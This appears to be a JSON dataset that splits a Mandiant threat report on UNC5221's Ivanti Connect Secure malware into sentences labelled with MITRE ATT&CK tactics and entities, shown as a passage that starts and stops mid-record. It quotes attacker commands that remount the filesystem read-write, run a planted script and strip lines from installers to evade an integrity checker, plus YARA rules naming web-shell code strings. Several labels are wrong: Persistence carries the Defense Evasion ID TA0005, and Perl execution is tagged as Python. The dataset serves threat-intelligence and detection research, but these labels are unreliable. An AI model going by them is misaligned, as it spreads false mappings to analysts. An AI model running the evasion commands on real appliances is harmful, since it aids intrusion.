/home/etc/sql/dsserver/sessionserver.sh\");\nsystem(\"/home/etc/sql/dsserver/sessionserver.sh 1>/dev/null 2>/tmp/errlog\");", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-30_mandiant_report-p1-s11-cafa5c", "source": "mandiant", "doc_id": "30_mandiant_report", "page_number": 1, "sentence_id": 11, "context_before": "\"/perl\";\nuse DSSafe;\nsystem(\"mount -o remount,rw /\");\nsystem(\"chmod a+x /home/etc/sql/dsserver/sessionserver.sh\");\nsystem(\"/home/etc/sql/dsserver/sessionserver.sh 1>/dev/null 2>/tmp/errlog\");", "sentence_text": "system(\"mount -o remount,ro /\");\nCustom Malware Identified ZIPLINE", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-30_mandiant_report-p1-s12-6e58e1", "source": "mandiant", "doc_id": "30_mandiant_report", "page_number": 1, "sentence_id": 12, "context_before": "system(\"mount -o remount,ro /\");\nCustom Malware Identified ZIPLINE", "sentence_text": "Passive Backdoor ZIPLINE is a passive backdoor that hijacks an exported function, accept()\n, from the file libsecure.so.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-30_mandiant_report-p1-s13-7719a3", "source": "mandiant", "doc_id": "30_mandiant_report", "page_number": 1, "sentence_id": 13, "context_before": "Passive Backdoor ZIPLINE is a passive backdoor that hijacks an exported function, accept()\n, from the file libsecure.so.", "sentence_text": "If so, the malicious functionality of ZIPLINE is triggered.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-30_mandiant_report-p1-s14-7252df", "source": "mandiant", "doc_id": "30_mandiant_report", "page_number": 1, "sentence_id": 14, "context_before": "If so, the malicious functionality of ZIPLINE is triggered.", "sentence_text": "ZIPLINE will then receive an encrypted header which specifies the command to be executed.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071", "name": "Application Layer Protocol" } ], "procedure": "Receive an encrypted header that specifies the command to be executed.", "entities": [ { "text": "ZIPLINE", "start": 0, "end": 7, "label": "MalwareTool" }, { "text": "receive an encrypted header which specifies the command to be executed", "start": 18, "end": 88, "label": "Action" } ] }, { "uid": "mandiant-30_mandiant_report-p1-s15-c3a572", "source": "mandiant", "doc_id": "30_mandiant_report", "page_number": 1, "sentence_id": 15, "context_before": "ZIPLINE will then receive an encrypted header which specifies the command to be executed.", "sentence_text": "Further details about this hijacking technique for the accept()\nfunction can be found in this SecureIdeas post.\nZIPLINE supports the following commands:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-30_mandiant_report-p1-s16-d99ffa", "source": "mandiant", "doc_id": "30_mandiant_report", "page_number": 1, "sentence_id": 16, "context_before": "Further details about this hijacking technique for the accept()\nfunction can be found in this SecureIdeas post.\nZIPLINE supports the following commands:", "sentence_text": "Upon initialization, ZIPLINE copies /etc/ld.so.preload to /tmp/data/root/etc/ld.so.preload , which will be executed if the process name is “dspkginstall”.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Persistence" } ], "techniques": [ { "id": "T1574", "name": "Hijack Execution Flow" } ], "procedure": "Copy /etc/ld.so.preload to a writable location to enable execution when the process name matches dspkginstall.", "entities": [ { "text": "ZIPLINE", "start": 21, "end": 28, "label": "MalwareTool" }, { "text": "copies /etc/ld.so.preload to /tmp/data/root/etc/ld.so.preload", "start": 29, "end": 90, "label": "Action" }, { "text": "/etc/ld.so.preload", "start": 36, "end": 54, "label": "Infrastructure_Indicator" }, { "text": "/tmp/data/root/etc/ld.so.preload", "start": 58, "end": 90, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-30_mandiant_report-p1-s17-3b43a9", "source": "mandiant", "doc_id": "30_mandiant_report", "page_number": 1, "sentence_id": 17, "context_before": "Upon initialization, ZIPLINE copies /etc/ld.so.preload to /tmp/data/root/etc/ld.so.preload , which will be executed if the process name is “dspkginstall”.", "sentence_text": "ZIPLINE then copies itself to /tmp/data/root/home/lib Upon termination ZIPLINE first checks if the process name is tar.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-30_mandiant_report-p1-s18-556fec", "source": "mandiant", "doc_id": "30_mandiant_report", "page_number": 1, "sentence_id": 18, "context_before": "ZIPLINE then copies itself to /tmp/data/root/home/lib Upon termination ZIPLINE first checks if the process name is tar.", "sentence_text": "If the parameter --exclude is used, ZIPLINE will add itself to the CS exclusion_list .", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-30_mandiant_report-p1-s19-724645", "source": "mandiant", "doc_id": "30_mandiant_report", "page_number": 1, "sentence_id": 19, "context_before": "If the parameter --exclude is used, ZIPLINE will add itself to the CS exclusion_list .", "sentence_text": "The exclusion_list is part of the Ivanti Integrity Checker Tool and Mandiant assesses this is a measure implemented by the attacker to evade detection.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-30_mandiant_report-p1-s20-7ab43f", "source": "mandiant", "doc_id": "30_mandiant_report", "page_number": 1, "sentence_id": 20, "context_before": "The exclusion_list is part of the Ivanti Integrity Checker Tool and Mandiant assesses this is a measure implemented by the attacker to evade detection.", "sentence_text": "This is achieved using the command:\necho >> ./installer/", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-30_mandiant_report-p1-s22-9fbed5", "source": "mandiant", "doc_id": "30_mandiant_report", "page_number": 1, "sentence_id": 22, "context_before": "bom_files/", "sentence_text": "If the parameter ./installer is used, ZIPLINE deletes specific lines from /pkg/do-install and ./installer/do-install .", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1070", "name": "Indicator Removal" } ], "procedure": "Delete specific lines from /pkg/do-install and ./installer/do-install using the ./installer parameter.", "entities": [ { "text": "ZIPLINE", "start": 38, "end": 45, "label": "MalwareTool" }, { "text": "deletes specific lines from /pkg/do-install and ./installer/do-install", "start": 46, "end": 116, "label": "Action" }, { "text": "/pkg/do-install", "start": 74, "end": 89, "label": "Infrastructure_Indicator" }, { "text": "./installer/do-install", "start": 94, "end": 116, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-30_mandiant_report-p1-s23-ce6257", "source": "mandiant", "doc_id": "30_mandiant_report", "page_number": 1, "sentence_id": 23, "context_before": "If the parameter ./installer is used, ZIPLINE deletes specific lines from /pkg/do-install and ./installer/do-install .", "sentence_text": "To do so, it executes the following sed commands:\nsed -i '/retval=$(exec $installer $@)/d' /pkg/do-install sed -i '/exit $?/d' /pkg/do-install sed -i '/retval=$(exec $installer $@)/d' ./installer/do-install sed -i '/exit $?/d' ./installer/do-install THINSPOOL Dropper THINSPOOL is a dropper written in shell script that writes the web shell LIGHTWIRE to a legitimate CS file.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" }, { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1070", "name": "Indicator Removal" }, { "id": "T1059", "name": "Command and Scripting Interpreter" }, { "id": "T1505.003", "name": "Web Shell" } ], "procedure": "Execute sed commands to remove lines from installation scripts and use THINSPOOL to write the LIGHTWIRE web shell to a legitimate file.", "entities": [ { "text": "executes the following sed commands", "start": 13, "end": 48, "label": "Action" }, { "text": "THINSPOOL", "start": 268, "end": 277, "label": "MalwareTool" }, { "text": "writes the web shell LIGHTWIRE to a legitimate CS file", "start": 320, "end": 374, "label": "Action" }, { "text": "LIGHTWIRE", "start": 341, "end": 350, "label": "MalwareTool" }, { "text": "/pkg/do-install", "start": 91, "end": 106, "label": "Infrastructure_Indicator" }, { "text": "./installer/do-install", "start": 184, "end": 206, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-30_mandiant_report-p1-s24-af5884", "source": "mandiant", "doc_id": "30_mandiant_report", "page_number": 1, "sentence_id": 24, "context_before": "To do so, it executes the following sed commands:\nsed -i '/retval=$(exec $installer $@)/d' /pkg/do-install sed -i '/exit $?/d' /pkg/do-install sed -i '/retval=$(exec $installer $@)/d' ./installer/do-install sed -i '/exit $?/d' ./installer/do-install THINSPOOL Dropper THINSPOOL is a dropper written in shell script that writes the web shell LIGHTWIRE to a legitimate CS file.", "sentence_text": "THINSPOOL will re-add the malicious web shell code to legitimate files after an update, allowing UNC5221 to persist on the compromised devices.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Persistence" } ], "techniques": [ { "id": "T1505.003", "name": "Web Shell" } ], "procedure": "Re-add malicious web shell code to legitimate files after an update to maintain persistence on compromised devices.", "entities": [ { "text": "THINSPOOL", "start": 0, "end": 9, "label": "MalwareTool" }, { "text": "re-add the malicious web shell code to legitimate files after an update", "start": 15, "end": 86, "label": "Action" }, { "text": "UNC5221", "start": 97, "end": 104, "label": "ThreatActor" } ] }, { "uid": "mandiant-30_mandiant_report-p1-s25-d634ca", "source": "mandiant", "doc_id": "30_mandiant_report", "page_number": 1, "sentence_id": 25, "context_before": "THINSPOOL will re-add the malicious web shell code to legitimate files after an update, allowing UNC5221 to persist on the compromised devices.", "sentence_text": "THINSPOOL attempts to evade Ivanti’s Integrity Checker but Mandiant observed this attempt failed.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1562", "name": "Impair Defenses" } ], "procedure": "Attempt to evade the Ivanti Integrity Checker.", "entities": [ { "text": "THINSPOOL", "start": 0, "end": 9, "label": "MalwareTool" }, { "text": "attempts to evade Ivanti’s Integrity Checker", "start": 10, "end": 54, "label": "Action" } ] }, { "uid": "mandiant-30_mandiant_report-p1-s26-5b8969", "source": "mandiant", "doc_id": "30_mandiant_report", "page_number": 1, "sentence_id": 26, "context_before": "THINSPOOL attempts to evade Ivanti’s Integrity Checker but Mandiant observed this attempt failed.", "sentence_text": "LIGHTWIRE and WIREFIRE Web Shells LIGHTWIRE is a web shell written in Perl CGI that is embedded into a legitimate Secure Connect file to enable arbitrary command execution.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0005", "name": "Persistence" } ], "techniques": [ { "id": "T1505.003", "name": "Web Shell" }, { "id": "T1059", "name": "Command and Scripting Interpreter" } ], "procedure": "Embed the LIGHTWIRE web shell into a legitimate Secure Connect file to enable arbitrary command execution.", "entities": [ { "text": "LIGHTWIRE", "start": 0, "end": 9, "label": "MalwareTool" }, { "text": "WIREFIRE", "start": 14, "end": 22, "label": "MalwareTool" }, { "text": "is embedded into a legitimate Secure Connect file to enable arbitrary command execution", "start": 84, "end": 171, "label": "Action" }, { "text": "Secure Connect file", "start": 114, "end": 133, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-30_mandiant_report-p1-s27-47b98d", "source": "mandiant", "doc_id": "30_mandiant_report", "page_number": 1, "sentence_id": 27, "context_before": "LIGHTWIRE and WIREFIRE Web Shells LIGHTWIRE is a web shell written in Perl CGI that is embedded into a legitimate Secure Connect file to enable arbitrary command execution.", "sentence_text": "LIGHTWIRE intercepts requests to compcheckresult.cgi that contain the parameters “ comp=comp ” and “ compid ”, where “ compid ” contains Base64-encoded and RC4-encrypted ciphertext.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071", "name": "Application Layer Protocol" } ], "procedure": "Intercept requests to compcheckresult.cgi containing specific parameters with encoded and encrypted data.", "entities": [ { "text": "LIGHTWIRE", "start": 0, "end": 9, "label": "MalwareTool" }, { "text": "intercepts requests to compcheckresult.cgi that contain the parameters “ comp=comp ” and “ compid ”", "start": 10, "end": 109, "label": "Action" }, { "text": "compcheckresult.cgi", "start": 33, "end": 52, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-30_mandiant_report-p1-s28-552149", "source": "mandiant", "doc_id": "30_mandiant_report", "page_number": 1, "sentence_id": 28, "context_before": "LIGHTWIRE intercepts requests to compcheckresult.cgi that contain the parameters “ comp=comp ” and “ compid ”, where “ compid ” contains Base64-encoded and RC4-encrypted ciphertext.", "sentence_text": "The decoded cleartext is interpreted and executed as Perl code.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059.006", "name": "Command and Scripting Interpreter: Python" } ], "procedure": "Interpret and execute decoded cleartext as Perl code.", "entities": [ { "text": "interpreted and executed as Perl code", "start": 25, "end": 62, "label": "Action" } ] }, { "uid": "mandiant-30_mandiant_report-p1-s29-fa3ecd", "source": "mandiant", "doc_id": "30_mandiant_report", "page_number": 1, "sentence_id": 29, "context_before": "The decoded cleartext is interpreted and executed as Perl code.", "sentence_text": "WIREFIRE is a web shell written in Python that exists as trojanized logic to a component of the Connect Secure appliance.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-30_mandiant_report-p1-s30-b6fb9e", "source": "mandiant", "doc_id": "30_mandiant_report", "page_number": 1, "sentence_id": 30, "context_before": "WIREFIRE is a web shell written in Python that exists as trojanized logic to a component of the Connect Secure appliance.", "sentence_text": "WIREFIRE supports downloading files to the compromised device and executing arbitrary commands.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059", "name": "Command and Scripting Interpreter" } ], "procedure": "Download files to the compromised device and execute arbitrary commands.", "entities": [ { "text": "WIREFIRE", "start": 0, "end": 8, "label": "MalwareTool" }, { "text": "supports downloading files to the compromised device and executing arbitrary commands", "start": 9, "end": 94, "label": "Action" } ] }, { "uid": "mandiant-30_mandiant_report-p1-s31-7c235f", "source": "mandiant", "doc_id": "30_mandiant_report", "page_number": 1, "sentence_id": 31, "context_before": "WIREFIRE supports downloading files to the compromised device and executing arbitrary commands.", "sentence_text": "It contains logic inserted before authentication that responds to specific HTTP POST requests to /api/v1/cav/client/visits .", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071", "name": "Application Layer Protocol" } ], "procedure": "Respond to specific HTTP POST requests to /api/v1/cav/client/visits before authentication.", "entities": [ { "text": "responds to specific HTTP POST requests to /api/v1/cav/client/visits", "start": 54, "end": 122, "label": "Action" }, { "text": "/api/v1/cav/client/visits", "start": 97, "end": 122, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-30_mandiant_report-p1-s32-6d71bb", "source": "mandiant", "doc_id": "30_mandiant_report", "page_number": 1, "sentence_id": 32, "context_before": "It contains logic inserted before authentication that responds to specific HTTP POST requests to /api/v1/cav/client/visits .", "sentence_text": "The output of the executed process will be zlib compressed, AES-encrypted with the same key, and Base64-encoded before being sent back as JSON with a “ message ” field via an HTTP 200 OK.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1573", "name": "Encrypted Channel" } ], "procedure": "Compress, encrypt, encode, and send back command output as JSON over HTTP.", "entities": [ { "text": "will be zlib compressed, AES-encrypted with the same key, and Base64-encoded before being sent back as JSON with a “ message ” field via an HTTP 200 OK", "start": 35, "end": 186, "label": "Action" } ] }, { "uid": "mandiant-30_mandiant_report-p1-s33-0d10ef", "source": "mandiant", "doc_id": "30_mandiant_report", "page_number": 1, "sentence_id": 33, "context_before": "The output of the executed process will be zlib compressed, AES-encrypted with the same key, and Base64-encoded before being sent back as JSON with a “ message ” field via an HTTP 200 OK.", "sentence_text": "WARPWIRE Credential Harvester WARPWIRE is a credential harvester written in Javascript that is embedded into a legitimate Connect Secure file.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-30_mandiant_report-p1-s34-c8d7c5", "source": "mandiant", "doc_id": "30_mandiant_report", "page_number": 1, "sentence_id": 34, "context_before": "WARPWIRE Credential Harvester WARPWIRE is a credential harvester written in Javascript that is embedded into a legitimate Connect Secure file.", "sentence_text": "WARPWIRE targets plaintext passwords and usernames which are submitted via a HTTP GET request to a command and control (C2) server.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" }, { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1555", "name": "Credentials from Password Stores" }, { "id": "T1071", "name": "Application Layer Protocol" } ], "procedure": "Collect plaintext passwords and usernames and transmit them via HTTP GET request to a command and control server.", "entities": [ { "text": "WARPWIRE", "start": 0, "end": 8, "label": "MalwareTool" }, { "text": "targets plaintext passwords and usernames which are submitted via a HTTP GET request to a command and control (C2) server", "start": 9, "end": 130, "label": "Action" } ] }, { "uid": "mandiant-30_mandiant_report-p1-s35-492d52", "source": "mandiant", "doc_id": "30_mandiant_report", "page_number": 1, "sentence_id": 35, "context_before": "WARPWIRE targets plaintext passwords and usernames which are submitted via a HTTP GET request to a command and control (C2) server.", "sentence_text": "WARPWIRE captures credentials submitted during the web logon to access layer 7 applications, like RDP.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1056", "name": "Input Capture" } ], "procedure": "Capture credentials submitted during web logon to access applications.", "entities": [ { "text": "WARPWIRE", "start": 0, "end": 8, "label": "MalwareTool" }, { "text": "captures credentials submitted during the web logon to access layer 7 applications", "start": 9, "end": 91, "label": "Action" } ] }, { "uid": "mandiant-30_mandiant_report-p1-s36-f168b4", "source": "mandiant", "doc_id": "30_mandiant_report", "page_number": 1, "sentence_id": 36, "context_before": "WARPWIRE captures credentials submitted during the web logon to access layer 7 applications, like RDP.", "sentence_text": "Captured credentials are Base64-encoded with btoa()\nbefore they are submitted to the C2 via a HTTP GET request.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" }, { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1041", "name": "Exfiltration Over C2 Channel" }, { "id": "T1071", "name": "Application Layer Protocol" } ], "procedure": "Encode captured credentials using Base64 and submit them to a C2 server via HTTP GET request.", "entities": [ { "text": "are Base64-encoded with btoa()\nbefore they are submitted to the C2 via a HTTP GET request", "start": 21, "end": 110, "label": "Action" } ] }, { "uid": "mandiant-30_mandiant_report-p1-s37-40d7ac", "source": "mandiant", "doc_id": "30_mandiant_report", "page_number": 1, "sentence_id": 37, "context_before": "Captured credentials are Base64-encoded with btoa()\nbefore they are submitted to the C2 via a HTTP GET request.", "sentence_text": "UNC5221 was created to track this suspected espionage actor.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-30_mandiant_report-p1-s38-8eb100", "source": "mandiant", "doc_id": "30_mandiant_report", "page_number": 1, "sentence_id": 38, "context_before": "UNC5221 was created to track this suspected espionage actor.", "sentence_text": "The targeting of edge infrastructure with zero-day vulnerabilities has been a consistent tactic leveraged by espionage actors to enable their operations.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-30_mandiant_report-p1-s39-d9c332", "source": "mandiant", "doc_id": "30_mandiant_report", "page_number": 1, "sentence_id": 39, "context_before": "The targeting of edge infrastructure with zero-day vulnerabilities has been a consistent tactic leveraged by espionage actors to enable their operations.", "sentence_text": "Additionally, Mandiant has previously observed multiple suspected APT actors utilizing appliance specific malware to enable post-exploitation and evade detection .", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-30_mandiant_report-p1-s40-537f79", "source": "mandiant", "doc_id": "30_mandiant_report", "page_number": 1, "sentence_id": 40, "context_before": "Additionally, Mandiant has previously observed multiple suspected APT actors utilizing appliance specific malware to enable post-exploitation and evade detection .", "sentence_text": "UNC5221 primarily used compromised out-of-support Cyberoam VPN appliances for C2.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1090", "name": "Proxy" } ], "procedure": "Use compromised Cyberoam VPN appliances as infrastructure for command and control.", "entities": [ { "text": "UNC5221", "start": 0, "end": 7, "label": "ThreatActor" }, { "text": "used compromised out-of-support Cyberoam VPN appliances for C2", "start": 18, "end": 80, "label": "Action" }, { "text": "Cyberoam VPN appliances", "start": 50, "end": 73, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-30_mandiant_report-p1-s41-cb8249", "source": "mandiant", "doc_id": "30_mandiant_report", "page_number": 1, "sentence_id": 41, "context_before": "UNC5221 primarily used compromised out-of-support Cyberoam VPN appliances for C2.", "sentence_text": "These compromised devices were domestic to the victims, which likely helped the threat actor to better evade detection.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-30_mandiant_report-p1-s42-f7649d", "source": "mandiant", "doc_id": "30_mandiant_report", "page_number": 1, "sentence_id": 42, "context_before": "These compromised devices were domestic to the victims, which likely helped the threat actor to better evade detection.", "sentence_text": "Conclusion & Recommendations UNC5221’s activity demonstrates that exploiting and living on the edge of networks remains a viable and attractive target for espionage actors.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-30_mandiant_report-p1-s43-077d3d", "source": "mandiant", "doc_id": "30_mandiant_report", "page_number": 1, "sentence_id": 43, "context_before": "Conclusion & Recommendations UNC5221’s activity demonstrates that exploiting and living on the edge of networks remains a viable and attractive target for espionage actors.", "sentence_text": "As we have previously reported , the combination of zero-day exploitation, edge device compromise, use of compromised C2 infrastructure, and detection evasion methods such as writing code to legitimate files have become a hallmark of espionage actors’ toolboxes.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-30_mandiant_report-p1-s44-92f588", "source": "mandiant", "doc_id": "30_mandiant_report", "page_number": 1, "sentence_id": 44, "context_before": "As we have previously reported , the combination of zero-day exploitation, edge device compromise, use of compromised C2 infrastructure, and detection evasion methods such as writing code to legitimate files have become a hallmark of espionage actors’ toolboxes.", "sentence_text": "We recommend following the guidance outlined in the Ivanti blog post on this activity.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-30_mandiant_report-p1-s45-a56e2c", "source": "mandiant", "doc_id": "30_mandiant_report", "page_number": 1, "sentence_id": 45, "context_before": "We recommend following the guidance outlined in the Ivanti blog post on this activity.", "sentence_text": "Ivanti customers are urged to implement mitigation as soon as possible and to follow the post for upcoming patch release schedules.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-30_mandiant_report-p1-s46-eaf25c", "source": "mandiant", "doc_id": "30_mandiant_report", "page_number": 1, "sentence_id": 46, "context_before": "Ivanti customers are urged to implement mitigation as soon as possible and to follow the post for upcoming patch release schedules.", "sentence_text": "Details about Ivanti’s Integrity Checker Tool (ICT)\nare also available.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-30_mandiant_report-p1-s47-b8ab6d", "source": "mandiant", "doc_id": "30_mandiant_report", "page_number": 1, "sentence_id": 47, "context_before": "Details about Ivanti’s Integrity Checker Tool (ICT)\nare also available.", "sentence_text": "Acknowledgement\nWe would like to thank the team at Ivanti for their partnership and support in this investigation.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-30_mandiant_report-p1-s48-a7c626", "source": "mandiant", "doc_id": "30_mandiant_report", "page_number": 1, "sentence_id": 48, "context_before": "Acknowledgement\nWe would like to thank the team at Ivanti for their partnership and support in this investigation.", "sentence_text": "We would like to specifically acknowledge Aseel Kayal and Nick Simonian from Mandiant’s Adversary Methods Research and Discovery (RAD) team for their support of this investigation.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-30_mandiant_report-p1-s49-95ae93", "source": "mandiant", "doc_id": "30_mandiant_report", "page_number": 1, "sentence_id": 49, "context_before": "We would like to specifically acknowledge Aseel Kayal and Nick Simonian from Mandiant’s Adversary Methods Research and Discovery (RAD) team for their support of this investigation.", "sentence_text": "Indicators of Compromise (IOCs)\nNetwork-Based Indicators (NBIs)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-30_mandiant_report-p1-s50-9f37d0", "source": "mandiant", "doc_id": "30_mandiant_report", "page_number": 1, "sentence_id": 50, "context_before": "Indicators of Compromise (IOCs)\nNetwork-Based Indicators (NBIs)", "sentence_text": "YARA Rule\nrule M_Hunting_Dropper_WIREFIRE_1 { meta:\nauthor = \"Mandiant\" description = \"This rule detects WIREFIRE, a web shell written in Python that exists as trojanized logic to a component of the pulse secure appliance.\"", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-30_mandiant_report-p1-s51-995737", "source": "mandiant", "doc_id": "30_mandiant_report", "page_number": 1, "sentence_id": 51, "context_before": "YARA Rule\nrule M_Hunting_Dropper_WIREFIRE_1 { meta:\nauthor = \"Mandiant\" description = \"This rule detects WIREFIRE, a web shell written in Python that exists as trojanized logic to a component of the pulse secure appliance.\"", "sentence_text": "md5 = \"6de651357a15efd01db4e658249d4981\" strings:\n$s1 = \"zlib.decompress(aes.decrypt(base64.b64decode(\" ascii $s2 = \"aes.encrypt(t+('\\x00'*(16-len(t)%16))\" ascii $s3 = \"Handles DELETE request to delete an existing visits data.\"", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-30_mandiant_report-p1-s52-827454", "source": "mandiant", "doc_id": "30_mandiant_report", "page_number": 1, "sentence_id": 52, "context_before": "md5 = \"6de651357a15efd01db4e658249d4981\" strings:\n$s1 = \"zlib.decompress(aes.decrypt(base64.b64decode(\" ascii $s2 = \"aes.encrypt(t+('\\x00'*(16-len(t)%16))\" ascii $s3 = \"Handles DELETE request to delete an existing visits data.\"", "sentence_text": "ascii $s4 = \"request.data.decode().startswith('GIF'):\" ascii $s5 = \"Utils.api_log_admin\" ascii condition:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-30_mandiant_report-p1-s53-5ba137", "source": "mandiant", "doc_id": "30_mandiant_report", "page_number": 1, "sentence_id": 53, "context_before": "ascii $s4 = \"request.data.decode().startswith('GIF'):\" ascii $s5 = \"Utils.api_log_admin\" ascii condition:", "sentence_text": "filesize < 10KB and all of them } rule M_Hunting_Webshell_LIGHTWIRE_2 {", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-30_mandiant_report-p1-s54-c03ccd", "source": "mandiant", "doc_id": "30_mandiant_report", "page_number": 1, "sentence_id": 54, "context_before": "filesize < 10KB and all of them } rule M_Hunting_Webshell_LIGHTWIRE_2 {", "sentence_text": "meta:\nauthor = \"Mandiant\" description = \"Detects LIGHTWIRE based on the RC4 decoding and execution 1-liner.\"", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-30_mandiant_report-p1-s55-808eab", "source": "mandiant", "doc_id": "30_mandiant_report", "page_number": 1, "sentence_id": 55, "context_before": "meta:\nauthor = \"Mandiant\" description = \"Detects LIGHTWIRE based on the RC4 decoding and execution 1-liner.\"", "sentence_text": "md5 = \"3d97f55a03ceb4f71671aa2ecf5b24e9\" strings:\n$re1 = /eval\\{my.{1,20}Crypt::RC4->new\\(\".{1,50}->RC4\\", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-30_mandiant_report-p1-s56-844508", "source": "mandiant", "doc_id": "30_mandiant_report", "page_number": 1, "sentence_id": 56, "context_before": "md5 = \"3d97f55a03ceb4f71671aa2ecf5b24e9\" strings:\n$re1 = /eval\\{my.{1,20}Crypt::RC4->new\\(\".{1,50}->RC4\\", "sentence_text": "author = \"Mandiant\" description = \"This rule detects THINSPOOL, a dropper that installs the LIGHTWIRE web shell onto a Pulse Secure system.\"", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-30_mandiant_report-p1-s57-c97780", "source": "mandiant", "doc_id": "30_mandiant_report", "page_number": 1, "sentence_id": 57, "context_before": "author = \"Mandiant\" description = \"This rule detects THINSPOOL, a dropper that installs the LIGHTWIRE web shell onto a Pulse Secure system.\"", "sentence_text": "md5 = \"677c1aa6e2503b56fe13e1568a814754\" strings:\n$s1 = \"/tmp/qactg/\" ascii $s2 = \"echo '/home/config/dscommands'\" ascii $s3 = \"echo '/home/perl/DSLogConfig.pm'\" ascii $s4 = \"ADM20447\" ascii condition:\nfilesize < 10KB and all of them } rule M_Hunting_CredTheft_WARPWIRE_1 {", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-30_mandiant_report-p1-s58-e29822", "source": "mandiant", "doc_id": "30_mandiant_report", "page_number": 1, "sentence_id": 58, "context_before": "md5 = \"677c1aa6e2503b56fe13e1568a814754\" strings:\n$s1 = \"/tmp/qactg/\" ascii $s2 = \"echo '/home/config/dscommands'\" ascii $s3 = \"echo '/home/perl/DSLogConfig.pm'\" ascii $s4 = \"ADM20447\" ascii condition:\nfilesize < 10KB and all of them } rule M_Hunting_CredTheft_WARPWIRE_1 {", "sentence_text": "meta:\nauthor = \"Mandiant\" description = \"This rule detects WARPWIRE, a credential stealer written in Javascript that is embedded into a legitimate Pulse Secure file.\"", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-30_mandiant_report-p1-s59-dc9096", "source": "mandiant", "doc_id": "30_mandiant_report", "page_number": 1, "sentence_id": 59, "context_before": "meta:\nauthor = \"Mandiant\" description = \"This rule detects WARPWIRE, a credential stealer written in Javascript that is embedded into a legitimate Pulse Secure file.\"", "sentence_text": "md5 = \"d0c7a334a4d9dcd3c6335ae13bee59ea\" strings:\n$s1 = {76 61 72 20 77 64 61 74 61 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 66 72 6d 4c 6f 67 69 6e 2e 75 73 65 72 6e 61 6d 65 2e 